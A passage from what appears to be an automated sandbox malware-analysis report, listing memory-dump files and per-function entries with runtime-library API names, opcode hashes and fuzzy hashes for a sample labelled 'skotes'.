                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1319684358-0
                                                                                                                                                                    • Opcode ID: cc069f2b7ecf62d08a816ba9483a368def90b0090dabb2ab3b041eb9469ba417
                                                                                                                                                                    • Instruction ID: af20491b38c32bf02477deac9eefe5a2d1a6bc10227a8d1ed46a9e14863b81aa
                                                                                                                                                                    • Opcode Fuzzy Hash: cc069f2b7ecf62d08a816ba9483a368def90b0090dabb2ab3b041eb9469ba417
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B319C71E00A258FDB14DFA8D8415EDB7B6AF09310B24447EE805EB380DB719E028FA4
                                                                                                                                                                    Function 0064CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                    • String ID: vd
                                                                                                                                                                    • API String ID: 3213747228-3616272301
                                                                                                                                                                    • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                    • Instruction ID: a460c0b09a48e37c6ee6a9d3c2e6fdbd8bcf807612c28d6bbace3128253b6885
                                                                                                                                                                    • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                    • Instruction Fuzzy Hash: 20B10232D066459FDB55CF28C881BEEBBE7EF45360F1441AAE855EB341D6348D02CBA4
                                                                                                                                                                    Function 00641B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00641B57
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00641B66
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00641C2A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                    • String ID: pContext$switchState
                                                                                                                                                                    • API String ID: 2656283622-2660820399
                                                                                                                                                                    • Opcode ID: ee25dd7a6069cf4b6bc9d24435d08713dd6b2c44b985cc268959dd3e1af69d38
                                                                                                                                                                    • Instruction ID: c4af70be2002f6a498c1d5149df6a0228eaa304b0ecde522f706486475fd1627
                                                                                                                                                                    • Opcode Fuzzy Hash: ee25dd7a6069cf4b6bc9d24435d08713dd6b2c44b985cc268959dd3e1af69d38
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B31B435A00214ABCF45EF64C881AADB7B7FF56314F208569E9119B382EB71EE41CA94
                                                                                                                                                                    Function 00644E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00644E6D
                                                                                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00644E86
                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 00644EAC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                                                                                    • Opcode ID: 6474584171c40ae59ef4ffb7303d38b5a4b8714d9aa5d2ee7b2c61f023b643ce
                                                                                                                                                                    • Instruction ID: f3103d1a6a173f622c85e87c777396e18476a01d8961327bbfb542c220d1486d
                                                                                                                                                                    • Opcode Fuzzy Hash: 6474584171c40ae59ef4ffb7303d38b5a4b8714d9aa5d2ee7b2c61f023b643ce
                                                                                                                                                                    • Instruction Fuzzy Hash: E621C472A04205AFCB14DF68DD47FEA77BAFF84720B24822DF91597680DF31E9008695
                                                                                                                                                                    Function 0064727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
